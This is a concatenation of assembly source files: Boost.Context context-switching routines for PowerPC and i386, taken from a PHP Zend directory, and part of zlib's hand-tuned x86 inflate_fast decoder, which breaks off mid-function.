stfd 0, 248(1) # save FPSCR
# store RSP (pointing to context-data) in R6
mr 6, 1
# restore RSP (pointing to context-data) from R4
mr 1, 4
# restore CR
lwz 0, 4(1)
mtcr 0
# restore LR
lwz 0, 8(1)
mtlr 0
# load PC
lwz 0, 240(1)
mtctr 0
# restore TOC
lwz 2, 20(1)
# restore R14 to R31
lwz 14, 24(1)
lwz 15, 28(1)
lwz 16, 32(1)
lwz 17, 36(1)
lwz 18, 40(1)
lwz 19, 44(1)
lwz 20, 48(1)
lwz 21, 52(1)
lwz 22, 56(1)
lwz 23, 60(1)
lwz 24, 64(1)
lwz 25, 68(1)
lwz 26, 72(1)
lwz 27, 76(1)
lwz 28, 80(1)
lwz 29, 84(1)
lwz 30, 88(1)
lwz 31, 92(1)
# restore F14 to F31
lfd 14, 96(1)
lfd 15, 104(1)
lfd 16, 112(1)
lfd 17, 120(1)
lfd 18, 128(1)
lfd 19, 136(1)
lfd 20, 144(1)
lfd 21, 152(1)
lfd 22, 160(1)
lfd 23, 168(1)
lfd 24, 176(1)
lfd 25, 184(1)
lfd 26, 192(1)
lfd 27, 200(1)
lfd 28, 208(1)
lfd 29, 216(1)
lfd 30, 224(1)
lfd 31, 232(1)
# hidden pointer
lwz 3, 244(1)
lfd 0, 248(1) # load FPSCR
mtfsf 0xff, 0 # restore FPSCR
# adjust stack
addi 1, 1, 256
# zero in r3 indicates first jump to context-function
cmpdi 3, 0
beq use_entry_arg
# return transfer_t
stw 6, 0(3)
stw 5, 4(3)
# jump to context
bctr
use_entry_arg:
# copy transfer_t into transfer_fn arg registers
mr 3, 6
mr 4, 5
# jump to context
bctr
|
Aidam7/PHavirP
| 3,788
|
Zend/asm/jump_i386_sysv_elf_gas.S
|
/*
Copyright Oliver Kowalke 2009.
Distributed under the Boost Software License, Version 1.0.
(See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
*/
/****************************************************************************************
* *
* ---------------------------------------------------------------------------------- *
* | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | *
* ---------------------------------------------------------------------------------- *
* | 0x0 | 0x4 | 0x8 | 0xc | 0x10 | 0x14 | 0x18 | 0x1c | *
* ---------------------------------------------------------------------------------- *
* | fc_mxcsr|fc_x87_cw| guard | EDI | ESI | EBX | EBP | EIP | *
* ---------------------------------------------------------------------------------- *
* ---------------------------------------------------------------------------------- *
* | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | *
* ---------------------------------------------------------------------------------- *
* | 0x20 | 0x24 | 0x28 | | *
* ---------------------------------------------------------------------------------- *
* | hidden | to | data | | *
* ---------------------------------------------------------------------------------- *
* *
****************************************************************************************/
.file "jump_i386_sysv_elf_gas.S"
.text
.globl jump_fcontext
.align 2
.type jump_fcontext,@function
jump_fcontext:
leal -0x1c(%esp), %esp /* prepare stack */
#if !defined(BOOST_USE_TSX)
stmxcsr (%esp) /* save MMX control- and status-word */
fnstcw 0x4(%esp) /* save x87 control-word */
#endif
#if defined(BOOST_CONTEXT_TLS_STACK_PROTECTOR)
movl %gs:0x14, %ecx /* read stack guard from TLS record */
movl %ecx, 0x8(%esp) /* save stack guard */
#endif
movl %edi, 0xc(%esp) /* save EDI */
movl %esi, 0x10(%esp) /* save ESI */
movl %ebx, 0x14(%esp) /* save EBX */
movl %ebp, 0x18(%esp) /* save EBP */
/* store ESP (pointing to context-data) in ECX */
movl %esp, %ecx
/* first arg of jump_fcontext() == fcontext to jump to */
movl 0x24(%esp), %eax
/* second arg of jump_fcontext() == data to be transferred */
movl 0x28(%esp), %edx
/* restore ESP (pointing to context-data) from EAX */
movl %eax, %esp
/* address of returned transport_t */
movl 0x20(%esp), %eax
/* return parent fcontext_t */
movl %ecx, (%eax)
/* return data */
movl %edx, 0x4(%eax)
movl 0x1c(%esp), %ecx /* restore EIP */
#if !defined(BOOST_USE_TSX)
ldmxcsr (%esp) /* restore MMX control- and status-word */
fldcw 0x4(%esp) /* restore x87 control-word */
#endif
#if defined(BOOST_CONTEXT_TLS_STACK_PROTECTOR)
movl 0x8(%esp), %edx /* load stack guard */
movl %edx, %gs:0x14 /* restore stack guard to TLS record */
#endif
movl 0xc(%esp), %edi /* restore EDI */
movl 0x10(%esp), %esi /* restore ESI */
movl 0x14(%esp), %ebx /* restore EBX */
movl 0x18(%esp), %ebp /* restore EBP */
leal 0x24(%esp), %esp /* prepare stack */
/* jump to context */
jmp *%ecx
.size jump_fcontext,.-jump_fcontext
/* Mark that we don't need executable stack. */
.section .note.GNU-stack,"",%progbits
|
Aidam7/PHavirP
| 6,155
|
Zend/asm/make_ppc64_sysv_elf_gas.S
|
/*
Copyright Oliver Kowalke 2009.
Distributed under the Boost Software License, Version 1.0.
(See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
*/
/*******************************************************
* *
* ------------------------------------------------- *
* | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | *
* ------------------------------------------------- *
* | 0 | 4 | 8 | 12 | 16 | 20 | 24 | 28 | *
* ------------------------------------------------- *
* | TOC | R14 | R15 | R16 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | *
* ------------------------------------------------- *
* | 32 | 36 | 40 | 44 | 48 | 52 | 56 | 60 | *
* ------------------------------------------------- *
* | R17 | R18 | R19 | R20 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | *
* ------------------------------------------------- *
* | 64 | 68 | 72 | 76 | 80 | 84 | 88 | 92 | *
* ------------------------------------------------- *
* | R21 | R22 | R23 | R24 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | *
* ------------------------------------------------- *
* | 96 | 100 | 104 | 108 | 112 | 116 | 120 | 124 | *
* ------------------------------------------------- *
* | R25 | R26 | R27 | R28 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | *
* ------------------------------------------------- *
* | 128 | 132 | 136 | 140 | 144 | 148 | 152 | 156 | *
* ------------------------------------------------- *
* | R29 | R30 | R31 | hidden | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | *
* ------------------------------------------------- *
* | 160 | 164 | 168 | 172 | 176 | 180 | 184 | 188 | *
* ------------------------------------------------- *
* | CR | LR | PC | back-chain| *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | *
* ------------------------------------------------- *
* | 192 | 196 | 200 | 204 | 208 | 212 | 216 | 220 | *
* ------------------------------------------------- *
* | cr saved | lr saved | compiler | linker | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | *
* ------------------------------------------------- *
* | 224 | 228 | 232 | 236 | 240 | 244 | 248 | 252 | *
* ------------------------------------------------- *
* | TOC saved | FCTX | DATA | | *
* ------------------------------------------------- *
* *
*******************************************************/
.file "make_ppc64_sysv_elf_gas.S"
.globl make_fcontext
#if _CALL_ELF == 2
.text
.align 2
make_fcontext:
addis %r2, %r12, .TOC.-make_fcontext@ha
addi %r2, %r2, .TOC.-make_fcontext@l
.localentry make_fcontext, . - make_fcontext
#else
.section ".opd","aw"
.align 3
make_fcontext:
# ifdef _CALL_LINUX
.quad .L.make_fcontext,.TOC.@tocbase,0
.type make_fcontext,@function
.text
.align 2
.L.make_fcontext:
# else
.hidden .make_fcontext
.globl .make_fcontext
.quad .make_fcontext,.TOC.@tocbase,0
.size make_fcontext,24
.type .make_fcontext,@function
.text
.align 2
.make_fcontext:
# endif
#endif
# save return address into R6
mflr %r6
# first arg of make_fcontext() == top address of context-stack
# shift address in R3 to lower 16 byte boundary
clrrdi %r3, %r3, 4
# reserve space for context-data on context-stack
# including 64 byte of linkage + parameter area (R1 % 16 == 0)
subi %r3, %r3, 248
# third arg of make_fcontext() == address of context-function
# entry point (ELFv2) or descriptor (ELFv1)
#if _CALL_ELF == 2
# save address of context-function entry point
std %r5, 176(%r3)
#else
# save address of context-function entry point
ld %r4, 0(%r5)
std %r4, 176(%r3)
# save TOC of context-function
ld %r4, 8(%r5)
std %r4, 0(%r3)
#endif
# set back-chain to zero
li %r0, 0
std %r0, 184(%r3)
#if _CALL_ELF != 2
# zero in r3 indicates first jump to context-function
std %r0, 152(%r3)
#endif
# load LR
mflr %r0
# jump to label 1
bl 1f
1:
# load LR into R4
mflr %r4
# compute abs address of label finish
addi %r4, %r4, finish - 1b
# restore LR
mtlr %r0
# save address of finish as return-address for context-function
# will be entered after context-function returns
std %r4, 168(%r3)
# restore return address from R6
mtlr %r6
blr # return pointer to context-data
finish:
# save return address into R0
mflr %r0
# save return address on stack, set up stack frame
std %r0, 8(%r1)
# allocate stack space, R1 % 16 == 0
stdu %r1, -32(%r1)
# exit code is zero
li %r3, 0
# exit application
bl _exit
nop
#if _CALL_ELF == 2
.size make_fcontext, .-make_fcontext
#else
# ifdef _CALL_LINUX
.size .make_fcontext, .-.L.make_fcontext
# else
.size .make_fcontext, .-.make_fcontext
# endif
#endif
/* Mark that we don't need executable stack. */
.section .note.GNU-stack,"",%progbits
|
aiekick/Lumo
| 42,842
|
3rdparty/assimp/contrib/zlib/contrib/inflate86/inffast.S
|
/*
* inffast.S is a hand tuned assembler version of:
*
* inffast.c -- fast decoding
* Copyright (C) 1995-2003 Mark Adler
* For conditions of distribution and use, see copyright notice in zlib.h
*
* Copyright (C) 2003 Chris Anderson <christop@charm.net>
* Please use the copyright conditions above.
*
* This version (Jan-23-2003) of inflate_fast was coded and tested under
* GNU/Linux on a pentium 3, using the gcc-3.2 compiler distribution. On that
* machine, I found that gzip style archives decompressed about 20% faster than
* the gcc-3.2 -O3 -fomit-frame-pointer compiled version. Your results will
* depend on how large of a buffer is used for z_stream.next_in & next_out
* (8K-32K worked best for my 256K cpu cache) and how much overhead there is in
* stream processing I/O and crc32/addler32. In my case, this routine used
* 70% of the cpu time and crc32 used 20%.
*
* I am confident that this version will work in the general case, but I have
* not tested a wide variety of datasets or a wide variety of platforms.
*
* Jan-24-2003 -- Added -DUSE_MMX define for slightly faster inflating.
* It should be a runtime flag instead of compile time flag...
*
* Jan-26-2003 -- Added runtime check for MMX support with cpuid instruction.
* With -DUSE_MMX, only MMX code is compiled. With -DNO_MMX, only non-MMX code
* is compiled. Without either option, runtime detection is enabled. Runtime
* detection should work on all modern cpus and the recomended algorithm (flip
* ID bit on eflags and then use the cpuid instruction) is used in many
* multimedia applications. Tested under win2k with gcc-2.95 and gas-2.12
* distributed with cygwin3. Compiling with gcc-2.95 -c inffast.S -o
* inffast.obj generates a COFF object which can then be linked with MSVC++
* compiled code. Tested under FreeBSD 4.7 with gcc-2.95.
*
* Jan-28-2003 -- Tested Athlon XP... MMX mode is slower than no MMX (and
* slower than compiler generated code). Adjusted cpuid check to use the MMX
* code only for Pentiums < P4 until I have more data on the P4. Speed
* improvment is only about 15% on the Athlon when compared with code generated
* with MSVC++. Not sure yet, but I think the P4 will also be slower using the
* MMX mode because many of it's x86 ALU instructions execute in .5 cycles and
* have less latency than MMX ops. Added code to buffer the last 11 bytes of
* the input stream since the MMX code grabs bits in chunks of 32, which
* differs from the inffast.c algorithm. I don't think there would have been
* read overruns where a page boundary was crossed (a segfault), but there
* could have been overruns when next_in ends on unaligned memory (unintialized
* memory read).
*
* Mar-13-2003 -- P4 MMX is slightly slower than P4 NO_MMX. I created a C
* version of the non-MMX code so that it doesn't depend on zstrm and zstate
* structure offsets which are hard coded in this file. This was last tested
* with zlib-1.2.0 which is currently in beta testing, newer versions of this
* and inffas86.c can be found at http://www.eetbeetee.com/zlib/ and
* http://www.charm.net/~christop/zlib/
*/
/*
* if you have underscore linking problems (_inflate_fast undefined), try
* using -DGAS_COFF
*/
#if ! defined( GAS_COFF ) && ! defined( GAS_ELF )
#if defined( WIN32 ) || defined( __CYGWIN__ )
#define GAS_COFF /* windows object format */
#else
#define GAS_ELF
#endif
#endif /* ! GAS_COFF && ! GAS_ELF */
#if defined( GAS_COFF )
/* coff externals have underscores */
#define inflate_fast _inflate_fast
#define inflate_fast_use_mmx _inflate_fast_use_mmx
#endif /* GAS_COFF */
.file "inffast.S"
.globl inflate_fast
.text
.align 4,0
.L_invalid_literal_length_code_msg:
.string "invalid literal/length code"
.align 4,0
.L_invalid_distance_code_msg:
.string "invalid distance code"
.align 4,0
.L_invalid_distance_too_far_msg:
.string "invalid distance too far back"
#if ! defined( NO_MMX )
.align 4,0
.L_mask: /* mask[N] = ( 1 << N ) - 1 */
.long 0
.long 1
.long 3
.long 7
.long 15
.long 31
.long 63
.long 127
.long 255
.long 511
.long 1023
.long 2047
.long 4095
.long 8191
.long 16383
.long 32767
.long 65535
.long 131071
.long 262143
.long 524287
.long 1048575
.long 2097151
.long 4194303
.long 8388607
.long 16777215
.long 33554431
.long 67108863
.long 134217727
.long 268435455
.long 536870911
.long 1073741823
.long 2147483647
.long 4294967295
#endif /* NO_MMX */
.text
/*
* struct z_stream offsets, in zlib.h
*/
#define next_in_strm 0 /* strm->next_in */
#define avail_in_strm 4 /* strm->avail_in */
#define next_out_strm 12 /* strm->next_out */
#define avail_out_strm 16 /* strm->avail_out */
#define msg_strm 24 /* strm->msg */
#define state_strm 28 /* strm->state */
/*
* struct inflate_state offsets, in inflate.h
*/
#define mode_state 0 /* state->mode */
#define wsize_state 32 /* state->wsize */
#define write_state 40 /* state->write */
#define window_state 44 /* state->window */
#define hold_state 48 /* state->hold */
#define bits_state 52 /* state->bits */
#define lencode_state 68 /* state->lencode */
#define distcode_state 72 /* state->distcode */
#define lenbits_state 76 /* state->lenbits */
#define distbits_state 80 /* state->distbits */
/*
* inflate_fast's activation record
*/
#define local_var_size 64 /* how much local space for vars */
#define strm_sp 88 /* first arg: z_stream * (local_var_size + 24) */
#define start_sp 92 /* second arg: unsigned int (local_var_size + 28) */
/*
* offsets for local vars on stack
*/
#define out 60 /* unsigned char* */
#define window 56 /* unsigned char* */
#define wsize 52 /* unsigned int */
#define write 48 /* unsigned int */
#define in 44 /* unsigned char* */
#define beg 40 /* unsigned char* */
#define buf 28 /* char[ 12 ] */
#define len 24 /* unsigned int */
#define last 20 /* unsigned char* */
#define end 16 /* unsigned char* */
#define dcode 12 /* code* */
#define lcode 8 /* code* */
#define dmask 4 /* unsigned int */
#define lmask 0 /* unsigned int */
/*
* typedef enum inflate_mode consts, in inflate.h
*/
#define INFLATE_MODE_TYPE 11 /* state->mode flags enum-ed in inflate.h */
#define INFLATE_MODE_BAD 26
#if ! defined( USE_MMX ) && ! defined( NO_MMX )
#define RUN_TIME_MMX
#define CHECK_MMX 1
#define DO_USE_MMX 2
#define DONT_USE_MMX 3
.globl inflate_fast_use_mmx
.data
.align 4,0
inflate_fast_use_mmx: /* integer flag for run time control 1=check,2=mmx,3=no */
.long CHECK_MMX
#if defined( GAS_ELF )
/* elf info */
.type inflate_fast_use_mmx,@object
.size inflate_fast_use_mmx,4
#endif
#endif /* RUN_TIME_MMX */
#if defined( GAS_COFF )
/* coff info: scl 2 = extern, type 32 = function */
.def inflate_fast; .scl 2; .type 32; .endef
#endif
.text
.align 32,0x90
inflate_fast:
pushl %edi
pushl %esi
pushl %ebp
pushl %ebx
pushf /* save eflags (strm_sp, state_sp assumes this is 32 bits) */
subl $local_var_size, %esp
cld
#define strm_r %esi
#define state_r %edi
movl strm_sp(%esp), strm_r
movl state_strm(strm_r), state_r
/* in = strm->next_in;
* out = strm->next_out;
* last = in + strm->avail_in - 11;
* beg = out - (start - strm->avail_out);
* end = out + (strm->avail_out - 257);
*/
movl avail_in_strm(strm_r), %edx
movl next_in_strm(strm_r), %eax
addl %eax, %edx /* avail_in += next_in */
subl $11, %edx /* avail_in -= 11 */
movl %eax, in(%esp)
movl %edx, last(%esp)
movl start_sp(%esp), %ebp
movl avail_out_strm(strm_r), %ecx
movl next_out_strm(strm_r), %ebx
subl %ecx, %ebp /* start -= avail_out */
negl %ebp /* start = -start */
addl %ebx, %ebp /* start += next_out */
subl $257, %ecx /* avail_out -= 257 */
addl %ebx, %ecx /* avail_out += out */
movl %ebx, out(%esp)
movl %ebp, beg(%esp)
movl %ecx, end(%esp)
/* wsize = state->wsize;
* write = state->write;
* window = state->window;
* hold = state->hold;
* bits = state->bits;
* lcode = state->lencode;
* dcode = state->distcode;
* lmask = ( 1 << state->lenbits ) - 1;
* dmask = ( 1 << state->distbits ) - 1;
*/
movl lencode_state(state_r), %eax
movl distcode_state(state_r), %ecx
movl %eax, lcode(%esp)
movl %ecx, dcode(%esp)
movl $1, %eax
movl lenbits_state(state_r), %ecx
shll %cl, %eax
decl %eax
movl %eax, lmask(%esp)
movl $1, %eax
movl distbits_state(state_r), %ecx
shll %cl, %eax
decl %eax
movl %eax, dmask(%esp)
movl wsize_state(state_r), %eax
movl write_state(state_r), %ecx
movl window_state(state_r), %edx
movl %eax, wsize(%esp)
movl %ecx, write(%esp)
movl %edx, window(%esp)
movl hold_state(state_r), %ebp
movl bits_state(state_r), %ebx
#undef strm_r
#undef state_r
#define in_r %esi
#define from_r %esi
#define out_r %edi
movl in(%esp), in_r
movl last(%esp), %ecx
cmpl in_r, %ecx
ja .L_align_long /* if in < last */
addl $11, %ecx /* ecx = &in[ avail_in ] */
subl in_r, %ecx /* ecx = avail_in */
movl $12, %eax
subl %ecx, %eax /* eax = 12 - avail_in */
leal buf(%esp), %edi
rep movsb /* memcpy( buf, in, avail_in ) */
movl %eax, %ecx
xorl %eax, %eax
rep stosb /* memset( &buf[ avail_in ], 0, 12 - avail_in ) */
leal buf(%esp), in_r /* in = buf */
movl in_r, last(%esp) /* last = in, do just one iteration */
jmp .L_is_aligned
/* align in_r on long boundary */
.L_align_long:
testl $3, in_r
jz .L_is_aligned
xorl %eax, %eax
movb (in_r), %al
incl in_r
movl %ebx, %ecx
addl $8, %ebx
shll %cl, %eax
orl %eax, %ebp
jmp .L_align_long
.L_is_aligned:
movl out(%esp), out_r
#if defined( NO_MMX )
jmp .L_do_loop
#endif
#if defined( USE_MMX )
jmp .L_init_mmx
#endif
/*** Runtime MMX check ***/
#if defined( RUN_TIME_MMX )
.L_check_mmx:
cmpl $DO_USE_MMX, inflate_fast_use_mmx
je .L_init_mmx
ja .L_do_loop /* > 2 */
pushl %eax
pushl %ebx
pushl %ecx
pushl %edx
pushf
movl (%esp), %eax /* copy eflags to eax */
xorl $0x200000, (%esp) /* try toggling ID bit of eflags (bit 21)
* to see if cpu supports cpuid...
* ID bit method not supported by NexGen but
* bios may load a cpuid instruction and
* cpuid may be disabled on Cyrix 5-6x86 */
popf
pushf
popl %edx /* copy new eflags to edx */
xorl %eax, %edx /* test if ID bit is flipped */
jz .L_dont_use_mmx /* not flipped if zero */
xorl %eax, %eax
cpuid
cmpl $0x756e6547, %ebx /* check for GenuineIntel in ebx,ecx,edx */
jne .L_dont_use_mmx
cmpl $0x6c65746e, %ecx
jne .L_dont_use_mmx
cmpl $0x49656e69, %edx
jne .L_dont_use_mmx
movl $1, %eax
cpuid /* get cpu features */
shrl $8, %eax
andl $15, %eax
cmpl $6, %eax /* check for Pentium family, is 0xf for P4 */
jne .L_dont_use_mmx
testl $0x800000, %edx /* test if MMX feature is set (bit 23) */
jnz .L_use_mmx
jmp .L_dont_use_mmx
.L_use_mmx:
movl $DO_USE_MMX, inflate_fast_use_mmx
jmp .L_check_mmx_pop
.L_dont_use_mmx:
movl $DONT_USE_MMX, inflate_fast_use_mmx
.L_check_mmx_pop:
popl %edx
popl %ecx
popl %ebx
popl %eax
jmp .L_check_mmx
#endif
/*** Non-MMX code ***/
#if defined ( NO_MMX ) || defined( RUN_TIME_MMX )
#define hold_r %ebp
#define bits_r %bl
#define bitslong_r %ebx
.align 32,0x90
.L_while_test:
/* while (in < last && out < end)
*/
cmpl out_r, end(%esp)
jbe .L_break_loop /* if (out >= end) */
cmpl in_r, last(%esp)
jbe .L_break_loop
.L_do_loop:
/* regs: %esi = in, %ebp = hold, %bl = bits, %edi = out
*
* do {
* if (bits < 15) {
* hold |= *((unsigned short *)in)++ << bits;
* bits += 16
* }
* this = lcode[hold & lmask]
*/
cmpb $15, bits_r
ja .L_get_length_code /* if (15 < bits) */
xorl %eax, %eax
lodsw /* al = *(ushort *)in++ */
movb bits_r, %cl /* cl = bits, needs it for shifting */
addb $16, bits_r /* bits += 16 */
shll %cl, %eax
orl %eax, hold_r /* hold |= *((ushort *)in)++ << bits */
.L_get_length_code:
movl lmask(%esp), %edx /* edx = lmask */
movl lcode(%esp), %ecx /* ecx = lcode */
andl hold_r, %edx /* edx &= hold */
movl (%ecx,%edx,4), %eax /* eax = lcode[hold & lmask] */
.L_dolen:
/* regs: %esi = in, %ebp = hold, %bl = bits, %edi = out
*
* dolen:
* bits -= this.bits;
* hold >>= this.bits
*/
movb %ah, %cl /* cl = this.bits */
subb %ah, bits_r /* bits -= this.bits */
shrl %cl, hold_r /* hold >>= this.bits */
/* check if op is a literal
* if (op == 0) {
* PUP(out) = this.val;
* }
*/
testb %al, %al
jnz .L_test_for_length_base /* if (op != 0) 45.7% */
shrl $16, %eax /* output this.val char */
stosb
jmp .L_while_test
.L_test_for_length_base:
/* regs: %esi = in, %ebp = hold, %bl = bits, %edi = out, %edx = len
*
* else if (op & 16) {
* len = this.val
* op &= 15
* if (op) {
* if (op > bits) {
* hold |= *((unsigned short *)in)++ << bits;
* bits += 16
* }
* len += hold & mask[op];
* bits -= op;
* hold >>= op;
* }
*/
#define len_r %edx
movl %eax, len_r /* len = this */
shrl $16, len_r /* len = this.val */
movb %al, %cl
testb $16, %al
jz .L_test_for_second_level_length /* if ((op & 16) == 0) 8% */
andb $15, %cl /* op &= 15 */
jz .L_save_len /* if (!op) */
cmpb %cl, bits_r
jae .L_add_bits_to_len /* if (op <= bits) */
movb %cl, %ch /* stash op in ch, freeing cl */
xorl %eax, %eax
lodsw /* al = *(ushort *)in++ */
movb bits_r, %cl /* cl = bits, needs it for shifting */
addb $16, bits_r /* bits += 16 */
shll %cl, %eax
orl %eax, hold_r /* hold |= *((ushort *)in)++ << bits */
movb %ch, %cl /* move op back to ecx */
.L_add_bits_to_len:
movl $1, %eax
shll %cl, %eax
decl %eax
subb %cl, bits_r
andl hold_r, %eax /* eax &= hold */
shrl %cl, hold_r
addl %eax, len_r /* len += hold & mask[op] */
.L_save_len:
movl len_r, len(%esp) /* save len */
#undef len_r
.L_decode_distance:
/* regs: %esi = in, %ebp = hold, %bl = bits, %edi = out, %edx = dist
*
* if (bits < 15) {
* hold |= *((unsigned short *)in)++ << bits;
* bits += 16
* }
* this = dcode[hold & dmask];
* dodist:
* bits -= this.bits;
* hold >>= this.bits;
* op = this.op;
*/
cmpb $15, bits_r
ja .L_get_distance_code /* if (15 < bits) */
xorl %eax, %eax
lodsw /* al = *(ushort *)in++ */
movb bits_r, %cl /* cl = bits, needs it for shifting */
addb $16, bits_r /* bits += 16 */
shll %cl, %eax
orl %eax, hold_r /* hold |= *((ushort *)in)++ << bits */
.L_get_distance_code:
movl dmask(%esp), %edx /* edx = dmask */
movl dcode(%esp), %ecx /* ecx = dcode */
andl hold_r, %edx /* edx &= hold */
movl (%ecx,%edx,4), %eax /* eax = dcode[hold & dmask] */
#define dist_r %edx
.L_dodist:
movl %eax, dist_r /* dist = this */
shrl $16, dist_r /* dist = this.val */
movb %ah, %cl
subb %ah, bits_r /* bits -= this.bits */
shrl %cl, hold_r /* hold >>= this.bits */
/* if (op & 16) {
* dist = this.val
* op &= 15
* if (op > bits) {
* hold |= *((unsigned short *)in)++ << bits;
* bits += 16
* }
* dist += hold & mask[op];
* bits -= op;
* hold >>= op;
*/
movb %al, %cl /* cl = this.op */
testb $16, %al /* if ((op & 16) == 0) */
jz .L_test_for_second_level_dist
andb $15, %cl /* op &= 15 */
jz .L_check_dist_one
cmpb %cl, bits_r
jae .L_add_bits_to_dist /* if (op <= bits) 97.6% */
movb %cl, %ch /* stash op in ch, freeing cl */
xorl %eax, %eax
lodsw /* al = *(ushort *)in++ */
movb bits_r, %cl /* cl = bits, needs it for shifting */
addb $16, bits_r /* bits += 16 */
shll %cl, %eax
orl %eax, hold_r /* hold |= *((ushort *)in)++ << bits */
movb %ch, %cl /* move op back to ecx */
.L_add_bits_to_dist:
movl $1, %eax
shll %cl, %eax
decl %eax /* (1 << op) - 1 */
subb %cl, bits_r
andl hold_r, %eax /* eax &= hold */
shrl %cl, hold_r
addl %eax, dist_r /* dist += hold & ((1 << op) - 1) */
jmp .L_check_window
.L_check_window:
/* regs: %esi = from, %ebp = hold, %bl = bits, %edi = out, %edx = dist
* %ecx = nbytes
*
* nbytes = out - beg;
* if (dist <= nbytes) {
* from = out - dist;
* do {
* PUP(out) = PUP(from);
* } while (--len > 0) {
* }
*/
movl in_r, in(%esp) /* save in so from can use it's reg */
movl out_r, %eax
subl beg(%esp), %eax /* nbytes = out - beg */
cmpl dist_r, %eax
jb .L_clip_window /* if (dist > nbytes) 4.2% */
movl len(%esp), %ecx
movl out_r, from_r
subl dist_r, from_r /* from = out - dist */
subl $3, %ecx
movb (from_r), %al
movb %al, (out_r)
movb 1(from_r), %al
movb 2(from_r), %dl
addl $3, from_r
movb %al, 1(out_r)
movb %dl, 2(out_r)
addl $3, out_r
rep movsb
movl in(%esp), in_r /* move in back to %esi, toss from */
jmp .L_while_test
.align 16,0x90
.L_check_dist_one:
cmpl $1, dist_r
jne .L_check_window
cmpl out_r, beg(%esp)
je .L_check_window
decl out_r
movl len(%esp), %ecx
movb (out_r), %al
subl $3, %ecx
movb %al, 1(out_r)
movb %al, 2(out_r)
movb %al, 3(out_r)
addl $4, out_r
rep stosb
jmp .L_while_test
.align 16,0x90
.L_test_for_second_level_length:
/* else if ((op & 64) == 0) {
* this = lcode[this.val + (hold & mask[op])];
* }
*/
testb $64, %al
jnz .L_test_for_end_of_block /* if ((op & 64) != 0) */
movl $1, %eax
shll %cl, %eax
decl %eax
andl hold_r, %eax /* eax &= hold */
addl %edx, %eax /* eax += this.val */
movl lcode(%esp), %edx /* edx = lcode */
movl (%edx,%eax,4), %eax /* eax = lcode[val + (hold&mask[op])] */
jmp .L_dolen
.align 16,0x90
.L_test_for_second_level_dist:
/* else if ((op & 64) == 0) {
* this = dcode[this.val + (hold & mask[op])];
* }
*/
testb $64, %al
jnz .L_invalid_distance_code /* if ((op & 64) != 0) */
movl $1, %eax
shll %cl, %eax
decl %eax
andl hold_r, %eax /* eax &= hold */
addl %edx, %eax /* eax += this.val */
movl dcode(%esp), %edx /* edx = dcode */
movl (%edx,%eax,4), %eax /* eax = dcode[val + (hold&mask[op])] */
jmp .L_dodist
.align 16,0x90
.L_clip_window:
/* regs: %esi = from, %ebp = hold, %bl = bits, %edi = out, %edx = dist
* %ecx = nbytes
*
* else {
* if (dist > wsize) {
* invalid distance
* }
* from = window;
* nbytes = dist - nbytes;
* if (write == 0) {
* from += wsize - nbytes;
*/
#define nbytes_r %ecx
movl %eax, nbytes_r
movl wsize(%esp), %eax /* prepare for dist compare */
negl nbytes_r /* nbytes = -nbytes */
movl window(%esp), from_r /* from = window */
cmpl dist_r, %eax
jb .L_invalid_distance_too_far /* if (dist > wsize) */
addl dist_r, nbytes_r /* nbytes = dist - nbytes */
cmpl $0, write(%esp)
jne .L_wrap_around_window /* if (write != 0) */
subl nbytes_r, %eax
addl %eax, from_r /* from += wsize - nbytes */
/* regs: %esi = from, %ebp = hold, %bl = bits, %edi = out, %edx = dist
* %ecx = nbytes, %eax = len
*
* if (nbytes < len) {
* len -= nbytes;
* do {
* PUP(out) = PUP(from);
* } while (--nbytes);
* from = out - dist;
* }
* }
*/
#define len_r %eax
movl len(%esp), len_r
cmpl nbytes_r, len_r
jbe .L_do_copy1 /* if (nbytes >= len) */
subl nbytes_r, len_r /* len -= nbytes */
rep movsb
movl out_r, from_r
subl dist_r, from_r /* from = out - dist */
jmp .L_do_copy1
cmpl nbytes_r, len_r
jbe .L_do_copy1 /* if (nbytes >= len) */
subl nbytes_r, len_r /* len -= nbytes */
rep movsb
movl out_r, from_r
subl dist_r, from_r /* from = out - dist */
jmp .L_do_copy1
.L_wrap_around_window:
/* regs: %esi = from, %ebp = hold, %bl = bits, %edi = out, %edx = dist
* %ecx = nbytes, %eax = write, %eax = len
*
* else if (write < nbytes) {
* from += wsize + write - nbytes;
* nbytes -= write;
* if (nbytes < len) {
* len -= nbytes;
* do {
* PUP(out) = PUP(from);
* } while (--nbytes);
* from = window;
* nbytes = write;
* if (nbytes < len) {
* len -= nbytes;
* do {
* PUP(out) = PUP(from);
* } while(--nbytes);
* from = out - dist;
* }
* }
* }
*/
#define write_r %eax
movl write(%esp), write_r
cmpl write_r, nbytes_r
jbe .L_contiguous_in_window /* if (write >= nbytes) */
addl wsize(%esp), from_r
addl write_r, from_r
subl nbytes_r, from_r /* from += wsize + write - nbytes */
subl write_r, nbytes_r /* nbytes -= write */
#undef write_r
movl len(%esp), len_r
cmpl nbytes_r, len_r
jbe .L_do_copy1 /* if (nbytes >= len) */
subl nbytes_r, len_r /* len -= nbytes */
rep movsb
movl window(%esp), from_r /* from = window */
movl write(%esp), nbytes_r /* nbytes = write */
cmpl nbytes_r, len_r
jbe .L_do_copy1 /* if (nbytes >= len) */
subl nbytes_r, len_r /* len -= nbytes */
rep movsb
movl out_r, from_r
subl dist_r, from_r /* from = out - dist */
jmp .L_do_copy1
.L_contiguous_in_window:
/* regs: %esi = from, %ebp = hold, %bl = bits, %edi = out, %edx = dist
